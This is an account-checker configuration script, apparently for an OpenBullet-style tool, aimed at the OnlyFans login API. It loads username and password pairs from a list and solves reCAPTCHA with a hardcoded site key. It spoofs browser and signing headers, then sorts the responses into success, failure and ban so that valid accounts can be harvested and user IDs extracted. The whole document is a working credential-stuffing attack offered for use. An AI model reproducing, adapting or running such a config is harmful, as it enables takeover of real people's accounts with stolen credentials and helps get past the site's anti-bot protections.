REQUEST GET "
https://onlyfans.com/api2/v2/users/login" ReadResponseSource=FALSE
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: application/json"
HEADER "app-token: 33d57ade8c02dbc5a333db99ff9ae26a"
KEYCHECK BanOnToCheck=FALSE
KEYCHAIN Ban OR
KEY "<RESPONSECODE>" Contains "403"
#XOD PARSE "<HEADERS(X-OF-REV)>" LR "" "" -> VAR "xod"
#HAshed FUNCTION Hash SHA1 "<xod>" -> VAR "shashed"
REQUEST GET "
https://onlyfans.com/api2/v2/init" ReadResponseSource=FALSE
HEADER "accept: application/json, text/plain, */*"
HEADER "accept-encoding: gzip, deflate, br"
HEADER "accept-language: en-US,en;q=0.9"
HEADER "app-token: 33d57ade8c02dbc5a333db99ff9ae26a"
HEADER "referer:
https://onlyfans.com/"
HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"90\", \"Google Chrome\";v=\"90\""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "sec-fetch-dest: empty"
HEADER "sec-fetch-mode: cors"
HEADER "sec-fetch-site: same-origin"
HEADER "sign: 61:87237d98881c0307c0fb42f2591a886de78d7204:784:60cb4202"
HEADER "time: 1624010873822"
HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
HEADER "x-bc: <shashed>"
#csrf PARSE "<COOKIES(csrf)>" LR "" "" -> VAR "csrf"
#sess PARSE "<COOKIES(sess)>" LR "" "" -> VAR "sess"
KEYCHECK BanOnToCheck=FALSE
KEYCHAIN Retry OR
KEY "<RESPONSECODE>" NotEqualTo "200"
KEY "<csrf>" EqualTo ""
RECAPTCHA "
https://onlyfans.com" "6LfVUxkUAAAAAFwy-qwWGqKNhT1vqmYF-9ULPAWz" -> VAR "RECAP"
FUNCTION Length "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"v3-recaptcha-response\":\"\",\"g-recaptcha-response\":\"<SOLUTION>\"}" -> VAR "len"
#POST_ALL_ONLYFANS_DATA REQUEST POST "
https://onlyfans.com/api2/v2/users/login"
CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"v3-recaptcha-response\":\"\",\"g-recaptcha-response\":\"<RECAP>\"}"
CONTENTTYPE "application/json"
COOKIE "csrf: <csrf>"
COOKIE "sess: <sess>"
HEADER "accept: application/json, text/plain, */*"
HEADER "accept-encoding: gzip, deflate, br"
HEADER "accept-language: en-US,en;q=0.9"
HEADER "app-token: 33d57ade8c02dbc5a333db99ff9ae26a"
HEADER "content-length: <len>"
HEADER "content-type: application/json"
HEADER "origin:
https://onlyfans.com"
HEADER "referer:
https://onlyfans.com/"
HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"90\", \"Google Chrome\";v=\"90\""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "sec-fetch-dest: empty"
HEADER "sec-fetch-mode: cors"
HEADER "sec-fetch-site: same-origin"
HEADER "sign: 61:4945a3849f2c047b1288b26b510a51299ed90f13:73a:60cb4202"
HEADER "time: 1624010908788"
HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
HEADER "x-bc: <shashed>"
KEYCHECK
KEYCHAIN Failure OR
KEY "\"Wrong email or password\""
KEY "Email is not valid"
KEYCHAIN Success OR
KEY "{\"accessToken\":\""
KEY "\"userId\""
KEYCHAIN Ban OR
KEY "\"Access denied.\""
KEY "\"Captcha wrong\""
KEY "code\":102"
#userId PARSE "<SOURCE>" JSON "userId" -> VAR "uid"